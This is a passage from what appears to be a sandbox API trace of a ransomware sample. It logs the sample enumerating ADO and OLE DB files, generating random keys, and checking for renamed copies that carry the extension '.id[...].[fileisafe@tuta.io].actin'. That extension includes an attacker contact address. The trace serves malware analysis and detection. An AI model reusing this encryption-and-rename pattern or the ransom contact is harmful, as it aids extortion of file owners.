pbBuffer=0x33ef7b8) returned 1 [0148.623] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\System\\ado\\adovbs.inc" (normalized: "c:\\program files\\common files\\system\\ado\\adovbs.inc"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2e4 [0148.624] GetFileSizeEx (in: hFile=0x2e4, lpFileSize=0x33ef750 | out: lpFileSize=0x33ef750*=15195) returned 1 [0148.624] CloseHandle (hObject=0x2e4) returned 1 [0148.624] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\System\\ado\\adovbs.inc" (normalized: "c:\\program files\\common files\\system\\ado\\adovbs.inc")) returned 0x20 [0148.624] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\System\\ado\\adovbs.inc.id[B4197730-0115].[fileisafe@tuta.io].actin" (normalized: "c:\\program files\\common files\\system\\ado\\adovbs.inc.id[b4197730-0115].[fileisafe@tuta.io].actin")) returned 0xffffffff [0148.624] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\System\\ado\\adovbs.inc" (normalized: "c:\\program files\\common files\\system\\ado\\adovbs.inc"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0148.624] CryptGenRandom (in: hProv=0xa968b8, dwLen=0x10, pbBuffer=0x33ef7b8 | out: pbBuffer=0x33ef7b8) returned 1 [0148.624] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\System\\ado\\en-US\\msader15.dll.mui" (normalized: "c:\\program files\\common files\\system\\ado\\en-us\\msader15.dll.mui"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2e4 [0148.625] GetFileSizeEx (in: hFile=0x2e4, lpFileSize=0x33ef750 | out: lpFileSize=0x33ef750*=17920) returned 1 [0148.625] CloseHandle (hObject=0x2e4) returned 1 [0148.625] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\System\\ado\\en-US\\msader15.dll.mui" (normalized: "c:\\program files\\common files\\system\\ado\\en-us\\msader15.dll.mui")) returned 0x20 [0148.625] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\System\\ado\\en-US\\msader15.dll.mui.id[B4197730-0115].[fileisafe@tuta.io].actin" (normalized: "c:\\program files\\common files\\system\\ado\\en-us\\msader15.dll.mui.id[b4197730-0115].[fileisafe@tuta.io].actin")) returned 0xffffffff [0148.625] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\System\\ado\\en-US\\msader15.dll.mui" (normalized: "c:\\program files\\common files\\system\\ado\\en-us\\msader15.dll.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0148.625] CryptGenRandom (in: hProv=0xa968b8, dwLen=0x10, pbBuffer=0x33ef7b8 | out: pbBuffer=0x33ef7b8) returned 1 [0148.625] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\System\\ado\\msader15.dll" (normalized: "c:\\program files\\common files\\system\\ado\\msader15.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2e4 [0148.626] GetFileSizeEx (in: hFile=0x2e4, lpFileSize=0x33ef750 | out: lpFileSize=0x33ef750*=2560) returned 1 [0148.626] CloseHandle (hObject=0x2e4) returned 1 [0148.626] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\System\\ado\\msader15.dll" (normalized: "c:\\program files\\common files\\system\\ado\\msader15.dll")) returned 0x20 [0148.626] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\System\\ado\\msader15.dll.id[B4197730-0115].[fileisafe@tuta.io].actin" (normalized: "c:\\program files\\common files\\system\\ado\\msader15.dll.id[b4197730-0115].[fileisafe@tuta.io].actin")) returned 0xffffffff [0148.626] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\System\\ado\\msader15.dll" (normalized: "c:\\program files\\common files\\system\\ado\\msader15.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0148.626] CryptGenRandom (in: hProv=0xa968b8, dwLen=0x10, pbBuffer=0x33ef7b8 | out: pbBuffer=0x33ef7b8) returned 1 [0148.626] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\System\\ado\\msado15.dll" (normalized: "c:\\program files\\common files\\system\\ado\\msado15.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2e4 [0148.627] GetFileSizeEx (in: hFile=0x2e4, lpFileSize=0x33ef750 | out: lpFileSize=0x33ef750*=1233920) returned 1 [0148.627] CloseHandle (hObject=0x2e4) returned 1 [0148.627] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\System\\ado\\msado15.dll" (normalized: "c:\\program files\\common files\\system\\ado\\msado15.dll")) returned 0x20 [0148.627] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\System\\ado\\msado15.dll.id[B4197730-0115].[fileisafe@tuta.io].actin" (normalized: "c:\\program files\\common files\\system\\ado\\msado15.dll.id[b4197730-0115].[fileisafe@tuta.io].actin")) returned 0xffffffff [0148.627] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\System\\ado\\msado15.dll" (normalized: "c:\\program files\\common files\\system\\ado\\msado15.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0148.627] CryptGenRandom (in: hProv=0xa968b8, dwLen=0x10, pbBuffer=0x33ef7b8 | out: pbBuffer=0x33ef7b8) returned 1 [0148.627] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\System\\ado\\msado20.tlb" (normalized: "c:\\program files\\common files\\system\\ado\\msado20.tlb"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2e4 [0148.628] GetFileSizeEx (in: hFile=0x2e4, lpFileSize=0x33ef750 | out: lpFileSize=0x33ef750*=50688) returned 1 [0148.628] CloseHandle (hObject=0x2e4) returned 1 [0148.628] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\System\\ado\\msado20.tlb" (normalized: "c:\\program files\\common files\\system\\ado\\msado20.tlb")) returned 0x20 [0148.628] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\System\\ado\\msado20.tlb.id[B4197730-0115].[fileisafe@tuta.io].actin" (normalized: "c:\\program files\\common files\\system\\ado\\msado20.tlb.id[b4197730-0115].[fileisafe@tuta.io].actin")) returned 0xffffffff [0148.628] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\System\\ado\\msado20.tlb" (normalized: "c:\\program files\\common files\\system\\ado\\msado20.tlb"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0148.629] CryptGenRandom (in: hProv=0xa968b8, dwLen=0x10, pbBuffer=0x33ef7b8 | out: pbBuffer=0x33ef7b8) returned 1 [0148.629] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\System\\ado\\msado21.tlb" (normalized: "c:\\program files\\common files\\system\\ado\\msado21.tlb"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2e4 [0148.629] GetFileSizeEx (in: hFile=0x2e4, lpFileSize=0x33ef750 | out: lpFileSize=0x33ef750*=53760) returned 1 [0148.629] CloseHandle (hObject=0x2e4) returned 1 [0148.629] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\System\\ado\\msado21.tlb" (normalized: "c:\\program files\\common files\\system\\ado\\msado21.tlb")) returned 0x20 [0148.629] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\System\\ado\\msado21.tlb.id[B4197730-0115].[fileisafe@tuta.io].actin" (normalized: "c:\\program files\\common files\\system\\ado\\msado21.tlb.id[b4197730-0115].[fileisafe@tuta.io].actin")) returned 0xffffffff [0148.629] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\System\\ado\\msado21.tlb" (normalized: "c:\\program files\\common files\\system\\ado\\msado21.tlb"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0148.629] CryptGenRandom (in: hProv=0xa968b8, dwLen=0x10, pbBuffer=0x33ef7b8 | out: pbBuffer=0x33ef7b8) returned 1 [0148.629] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\System\\ado\\msado25.tlb" (normalized: "c:\\program files\\common files\\system\\ado\\msado25.tlb"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2e4 [0148.630] GetFileSizeEx (in: hFile=0x2e4, lpFileSize=0x33ef750 | out: lpFileSize=0x33ef750*=69632) returned 1 [0148.630] CloseHandle (hObject=0x2e4) returned 1 [0148.630] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\System\\ado\\msado25.tlb" (normalized: "c:\\program files\\common files\\system\\ado\\msado25.tlb")) returned 0x20 [0148.630] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\System\\ado\\msado25.tlb.id[B4197730-0115].[fileisafe@tuta.io].actin" (normalized: "c:\\program files\\common files\\system\\ado\\msado25.tlb.id[b4197730-0115].[fileisafe@tuta.io].actin")) returned 0xffffffff [0148.630] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\System\\ado\\msado25.tlb" (normalized: "c:\\program files\\common files\\system\\ado\\msado25.tlb"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0148.630] CryptGenRandom (in: hProv=0xa968b8, dwLen=0x10, pbBuffer=0x33ef7b8 | out: pbBuffer=0x33ef7b8) returned 1 [0148.630] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\System\\ado\\msado26.tlb" (normalized: "c:\\program files\\common files\\system\\ado\\msado26.tlb"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2e4 [0148.631] GetFileSizeEx (in: hFile=0x2e4, lpFileSize=0x33ef750 | out: lpFileSize=0x33ef750*=70656) returned 1 [0148.631] CloseHandle (hObject=0x2e4) returned 1 [0148.631] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\System\\ado\\msado26.tlb" (normalized: "c:\\program files\\common files\\system\\ado\\msado26.tlb")) returned 0x20 [0148.631] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\System\\ado\\msado26.tlb.id[B4197730-0115].[fileisafe@tuta.io].actin" (normalized: "c:\\program files\\common files\\system\\ado\\msado26.tlb.id[b4197730-0115].[fileisafe@tuta.io].actin")) returned 0xffffffff [0148.631] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\System\\ado\\msado26.tlb" (normalized: "c:\\program files\\common files\\system\\ado\\msado26.tlb"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0148.631] CryptGenRandom (in: hProv=0xa968b8, dwLen=0x10, pbBuffer=0x33ef7b8 | out: pbBuffer=0x33ef7b8) returned 1 [0148.631] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\System\\ado\\msado27.tlb" (normalized: "c:\\program files\\common files\\system\\ado\\msado27.tlb"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2e4 [0148.632] GetFileSizeEx (in: hFile=0x2e4, lpFileSize=0x33ef750 | out: lpFileSize=0x33ef750*=71168) returned 1 [0148.632] CloseHandle (hObject=0x2e4) returned 1 [0148.632] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\System\\ado\\msado27.tlb" (normalized: "c:\\program files\\common files\\system\\ado\\msado27.tlb")) returned 0x20 [0148.632] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\System\\ado\\msado27.tlb.id[B4197730-0115].[fileisafe@tuta.io].actin" (normalized: "c:\\program files\\common files\\system\\ado\\msado27.tlb.id[b4197730-0115].[fileisafe@tuta.io].actin")) returned 0xffffffff [0148.632] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\System\\ado\\msado27.tlb" (normalized: "c:\\program files\\common files\\system\\ado\\msado27.tlb"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0148.632] CryptGenRandom (in: hProv=0xa968b8, dwLen=0x10, pbBuffer=0x33ef7b8 | out: pbBuffer=0x33ef7b8) returned 1 [0148.632] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\System\\ado\\msado28.tlb" (normalized: "c:\\program files\\common files\\system\\ado\\msado28.tlb"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2e4 [0148.632] GetFileSizeEx (in: hFile=0x2e4, lpFileSize=0x33ef750 | out: lpFileSize=0x33ef750*=70656) returned 1 [0148.632] CloseHandle (hObject=0x2e4) returned 1 [0148.632] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\System\\ado\\msado28.tlb" (normalized: "c:\\program files\\common files\\system\\ado\\msado28.tlb")) returned 0x20 [0148.633] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\System\\ado\\msado28.tlb.id[B4197730-0115].[fileisafe@tuta.io].actin" (normalized: "c:\\program files\\common files\\system\\ado\\msado28.tlb.id[b4197730-0115].[fileisafe@tuta.io].actin")) returned 0xffffffff [0148.633] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\System\\ado\\msado28.tlb" (normalized: "c:\\program files\\common files\\system\\ado\\msado28.tlb"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0148.633] CryptGenRandom (in: hProv=0xa968b8, dwLen=0x10, pbBuffer=0x33ef7b8 | out: pbBuffer=0x33ef7b8) returned 1 [0148.633] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\System\\ado\\msado60.tlb" (normalized: "c:\\program files\\common files\\system\\ado\\msado60.tlb"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2e4 [0148.633] GetFileSizeEx (in: hFile=0x2e4, lpFileSize=0x33ef750 | out: lpFileSize=0x33ef750*=70656) returned 1 [0148.633] CloseHandle (hObject=0x2e4) returned 1 [0148.634] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\System\\ado\\msado60.tlb" (normalized: "c:\\program files\\common files\\system\\ado\\msado60.tlb")) returned 0x20 [0148.634] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\System\\ado\\msado60.tlb.id[B4197730-0115].[fileisafe@tuta.io].actin" (normalized: "c:\\program files\\common files\\system\\ado\\msado60.tlb.id[b4197730-0115].[fileisafe@tuta.io].actin")) returned 0xffffffff [0148.634] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\System\\ado\\msado60.tlb" (normalized: "c:\\program files\\common files\\system\\ado\\msado60.tlb"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0148.634] CryptGenRandom (in: hProv=0xa968b8, dwLen=0x10, pbBuffer=0x33ef7b8 | out: pbBuffer=0x33ef7b8) returned 1 [0148.634] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\System\\ado\\msadomd.dll" (normalized: "c:\\program files\\common files\\system\\ado\\msadomd.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2e4 [0148.635] GetFileSizeEx (in: hFile=0x2e4, lpFileSize=0x33ef750 | out: lpFileSize=0x33ef750*=364032) returned 1 [0148.635] CloseHandle (hObject=0x2e4) returned 1 [0148.635] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\System\\ado\\msadomd.dll" (normalized: "c:\\program files\\common files\\system\\ado\\msadomd.dll")) returned 0x20 [0148.635] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\System\\ado\\msadomd.dll.id[B4197730-0115].[fileisafe@tuta.io].actin" (normalized: "c:\\program files\\common files\\system\\ado\\msadomd.dll.id[b4197730-0115].[fileisafe@tuta.io].actin")) returned 0xffffffff [0148.635] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\System\\ado\\msadomd.dll" (normalized: "c:\\program files\\common files\\system\\ado\\msadomd.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0148.635] CryptGenRandom (in: hProv=0xa968b8, dwLen=0x10, pbBuffer=0x33ef7b8 | out: pbBuffer=0x33ef7b8) returned 1 [0148.635] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\System\\ado\\msadomd28.tlb" (normalized: "c:\\program files\\common files\\system\\ado\\msadomd28.tlb"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2e4 [0148.635] GetFileSizeEx (in: hFile=0x2e4, lpFileSize=0x33ef750 | out: lpFileSize=0x33ef750*=13824) returned 1 [0148.635] CloseHandle (hObject=0x2e4) returned 1 [0148.635] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\System\\ado\\msadomd28.tlb" (normalized: "c:\\program files\\common files\\system\\ado\\msadomd28.tlb")) returned 0x20 [0148.635] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\System\\ado\\msadomd28.tlb.id[B4197730-0115].[fileisafe@tuta.io].actin" (normalized: "c:\\program files\\common files\\system\\ado\\msadomd28.tlb.id[b4197730-0115].[fileisafe@tuta.io].actin")) returned 0xffffffff [0148.635] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\System\\ado\\msadomd28.tlb" (normalized: "c:\\program files\\common files\\system\\ado\\msadomd28.tlb"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0148.636] CryptGenRandom (in: hProv=0xa968b8, dwLen=0x10, pbBuffer=0x33ef7b8 | out: pbBuffer=0x33ef7b8) returned 1 [0148.636] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\System\\ado\\msador15.dll" (normalized: "c:\\program files\\common files\\system\\ado\\msador15.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2e4 [0148.636] GetFileSizeEx (in: hFile=0x2e4, lpFileSize=0x33ef750 | out: lpFileSize=0x33ef750*=45568) returned 1 [0148.636] CloseHandle (hObject=0x2e4) returned 1 [0148.636] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\System\\ado\\msador15.dll" (normalized: "c:\\program files\\common files\\system\\ado\\msador15.dll")) returned 0x20 [0148.637] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\System\\ado\\msador15.dll.id[B4197730-0115].[fileisafe@tuta.io].actin" (normalized: "c:\\program files\\common files\\system\\ado\\msador15.dll.id[b4197730-0115].[fileisafe@tuta.io].actin")) returned 0xffffffff [0148.637] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\System\\ado\\msador15.dll" (normalized: "c:\\program files\\common files\\system\\ado\\msador15.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0148.637] CryptGenRandom (in: hProv=0xa968b8, dwLen=0x10, pbBuffer=0x33ef7b8 | out: pbBuffer=0x33ef7b8) returned 1 [0148.637] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\System\\ado\\msador28.tlb" (normalized: "c:\\program files\\common files\\system\\ado\\msador28.tlb"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2e4 [0148.638] GetFileSizeEx (in: hFile=0x2e4, lpFileSize=0x33ef750 | out: lpFileSize=0x33ef750*=35840) returned 1 [0148.638] CloseHandle (hObject=0x2e4) returned 1 [0148.638] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\System\\ado\\msador28.tlb" (normalized: "c:\\program files\\common files\\system\\ado\\msador28.tlb")) returned 0x20 [0148.638] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\System\\ado\\msador28.tlb.id[B4197730-0115].[fileisafe@tuta.io].actin" (normalized: "c:\\program files\\common files\\system\\ado\\msador28.tlb.id[b4197730-0115].[fileisafe@tuta.io].actin")) returned 0xffffffff [0148.638] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\System\\ado\\msador28.tlb" (normalized: "c:\\program files\\common files\\system\\ado\\msador28.tlb"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0148.638] CryptGenRandom (in: hProv=0xa968b8, dwLen=0x10, pbBuffer=0x33ef7b8 | out: pbBuffer=0x33ef7b8) returned 1 [0148.638] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\System\\ado\\msadox.dll" (normalized: "c:\\program files\\common files\\system\\ado\\msadox.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2e4 [0148.638] GetFileSizeEx (in: hFile=0x2e4, lpFileSize=0x33ef750 | out: lpFileSize=0x33ef750*=404992) returned 1 [0148.638] CloseHandle (hObject=0x2e4) returned 1 [0148.638] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\System\\ado\\msadox.dll" (normalized: "c:\\program files\\common files\\system\\ado\\msadox.dll")) returned 0x20 [0148.638] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\System\\ado\\msadox.dll.id[B4197730-0115].[fileisafe@tuta.io].actin" (normalized: "c:\\program files\\common files\\system\\ado\\msadox.dll.id[b4197730-0115].[fileisafe@tuta.io].actin")) returned 0xffffffff [0148.638] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\System\\ado\\msadox.dll" (normalized: "c:\\program files\\common files\\system\\ado\\msadox.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0148.639] CryptGenRandom (in: hProv=0xa968b8, dwLen=0x10, pbBuffer=0x33ef7b8 | out: pbBuffer=0x33ef7b8) returned 1 [0148.639] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\System\\ado\\msadox28.tlb" (normalized: "c:\\program files\\common files\\system\\ado\\msadox28.tlb"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2e4 [0148.639] GetFileSizeEx (in: hFile=0x2e4, lpFileSize=0x33ef750 | out: lpFileSize=0x33ef750*=24576) returned 1 [0148.639] CloseHandle (hObject=0x2e4) returned 1 [0148.639] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\System\\ado\\msadox28.tlb" (normalized: "c:\\program files\\common files\\system\\ado\\msadox28.tlb")) returned 0x20 [0148.639] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\System\\ado\\msadox28.tlb.id[B4197730-0115].[fileisafe@tuta.io].actin" (normalized: "c:\\program files\\common files\\system\\ado\\msadox28.tlb.id[b4197730-0115].[fileisafe@tuta.io].actin")) returned 0xffffffff [0148.639] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\System\\ado\\msadox28.tlb" (normalized: "c:\\program files\\common files\\system\\ado\\msadox28.tlb"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0148.639] CryptGenRandom (in: hProv=0xa968b8, dwLen=0x10, pbBuffer=0x33ef7b8 | out: pbBuffer=0x33ef7b8) returned 1 [0148.639] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\System\\ado\\msadrh15.dll" (normalized: "c:\\program files\\common files\\system\\ado\\msadrh15.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2f8 [0148.940] GetFileSizeEx (in: hFile=0x2f8, lpFileSize=0x33ef750 | out: lpFileSize=0x33ef750*=91136) returned 1 [0148.940] CloseHandle (hObject=0x2f8) returned 1 [0148.940] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\System\\ado\\msadrh15.dll" (normalized: "c:\\program files\\common files\\system\\ado\\msadrh15.dll")) returned 0x20 [0148.940] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\System\\ado\\msadrh15.dll.id[B4197730-0115].[fileisafe@tuta.io].actin" (normalized: "c:\\program files\\common files\\system\\ado\\msadrh15.dll.id[b4197730-0115].[fileisafe@tuta.io].actin")) returned 0xffffffff [0148.940] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\System\\ado\\msadrh15.dll" (normalized: "c:\\program files\\common files\\system\\ado\\msadrh15.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0148.941] CryptGenRandom (in: hProv=0xa968b8, dwLen=0x10, pbBuffer=0x33ef7b8 | out: pbBuffer=0x33ef7b8) returned 1 [0148.941] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\System\\Ole DB\\sqloledb.rll" (normalized: "c:\\program files\\common files\\system\\ole db\\sqloledb.rll"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2f8 [0148.942] GetFileSizeEx (in: hFile=0x2f8, lpFileSize=0x33ef750 | out: lpFileSize=0x33ef750*=4608) returned 1 [0148.942] CloseHandle (hObject=0x2f8) returned 1 [0148.942] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\System\\Ole DB\\sqloledb.rll" (normalized: "c:\\program files\\common files\\system\\ole db\\sqloledb.rll")) returned 0x20 [0148.942] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\System\\Ole DB\\sqloledb.rll.id[B4197730-0115].[fileisafe@tuta.io].actin" (normalized: "c:\\program files\\common files\\system\\ole 